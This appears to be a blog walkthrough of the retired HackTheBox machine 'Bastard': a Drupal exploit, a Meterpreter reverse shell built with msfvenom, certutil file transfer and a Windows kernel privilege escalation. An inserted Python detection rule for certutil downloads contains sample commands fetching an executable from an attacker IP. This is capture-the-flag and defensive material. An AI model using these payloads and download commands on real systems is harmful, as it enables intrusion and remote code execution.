The other day, a friend asked if I was on HackTheBox and I was reminded that I'd been absent for a while. Apparently, they are cranking out a new box every week, which could be good or bad -- I'm not really sure. While looking for something to write, I thought I'd take on one of their retired boxes and that would solve two "needs" simultaneously.

This box was interesting mostly because of the hunt for the exploit to gain a foothold on the system. From there, it was trial and error as to which technique would work for a particular task. After that, root was easy.

First, we kick off with Nmap:

Right off the bat, we see that the target is running Windows / IIS and Drupal.

We check out the Drupal site:

We get the Drupal version:

We run Droopescan:

We search through Searchsploit:

We find a vulnerability in Services with an exploit that does not work. I tried troubleshooting the issue but had no such luck. I then go hunting on the web and find:

Let's see if we can get a simple "whoami":
Next, let's check out the architecture:

We need a reverse shell:

msfvenom -p windows/x64/meterpreter/reverse_tcp -a x64 --platform windows LHOST= LPORT=443 -f exe >> mshell443.exe

I realize I already have a shell with that name, so I rename my shell to bastard.exe.

After some trial and error with downloading the file, certutil proves to be the winner.
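From the defender's side, the certutil download trick used above is a well-known living-off-the-land pattern worth alerting on. The following is an added example, not part of the original writeup: a small rule over Sysmon-style process-creation records (the `Image|CommandLine|ParentImage` field layout, host paths and attacker IP are all constructed for the example).

```python
import re
from typing import Dict, List, Optional

# Constructed Sysmon-style process-creation records (Image|CommandLine|ParentImage);
# hosts, paths and the attacker IP are made up for this example, not taken from the box.
SAMPLE_EVENTS = [
    "Image: C:\\Windows\\System32\\certutil.exe|CommandLine: certutil -urlcache -split -f http://10.10.14.5/bastard.exe C:\\inetpub\\drupal\\tmp\\bastard.exe|ParentImage: C:\\Windows\\System32\\cmd.exe",
    "Image: C:\\Windows\\System32\\certutil.exe|CommandLine: certutil -verifyctl -split -f https://10.10.14.5/stage.bin|ParentImage: C:\\Windows\\System32\\cmd.exe",
    "Image: C:\\Windows\\System32\\certutil.exe|CommandLine: certutil -decode C:\\Users\\Public\\blob.txt C:\\Users\\Public\\out.exe|ParentImage: C:\\Windows\\System32\\cmd.exe",
    "Image: C:\\Windows\\System32\\certutil.exe|CommandLine: certutil -store My|ParentImage: C:\\Windows\\explorer.exe",
    "Image: C:\\Windows\\System32\\cmd.exe|CommandLine: cmd /c dir C:\\inetpub|ParentImage: C:\\Windows\\System32\\inetsrv\\w3wp.exe",
]

URL_RE = re.compile(r"\bhttps?://\S+", re.IGNORECASE)
# certutil verbs that fetch remote content when given a URL; -decode is a separate staging signal.
FETCH_VERBS = {"urlcache", "verifyctl"}

def parse_event(line: str) -> Dict[str, str]:
    """Split 'Key: value|Key: value' into a dict; values may themselves contain ':'."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition(": ")
        fields[key.strip()] = value.strip()
    return fields

def classify_certutil(cmdline: str) -> Optional[str]:
    """Return a reason if the certutil command line looks like file transfer or staging, else None."""
    tokens = cmdline.lower().split()
    # normalise '-urlcache' and '/urlcache' to the bare verb name
    verbs = {t.lstrip("-/") for t in tokens if t.startswith(("-", "/"))}
    fetch = verbs & FETCH_VERBS
    if fetch and URL_RE.search(cmdline):
        return "certutil remote download (" + ", ".join(sorted(fetch)) + ")"
    if "decode" in verbs:
        return "certutil base64 decode to file"
    return None

def detect(events: List[str]) -> List[Dict[str, str]]:
    """Run the certutil rule over raw records; return the matching records with a Reason field."""
    hits = []
    for line in events:
        ev = parse_event(line)
        image = ev.get("Image", "").rsplit("\\", 1)[-1].lower()
        if image != "certutil.exe":
            continue
        reason = classify_certutil(ev.get("CommandLine", ""))
        if reason:
            hits.append({**ev, "Reason": reason})
    return hits
```

Running `detect(SAMPLE_EVENTS)` flags the two remote downloads and the decode, and ignores the benign `-store` call and the unrelated `cmd.exe` record; the `ParentImage` field is kept so a web-server worker ancestry can be used as extra context when triaging.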

We move the shell to our victim:

We check the directory as a sanity check. I should also point out that I created that directory earlier.

We execute our shell:

With our handler set up:

We catch the inbound connection:

We move to Exploit Suggester:

For some reason, ms16-075 does not work. I move to ms16-014:

And... we're root!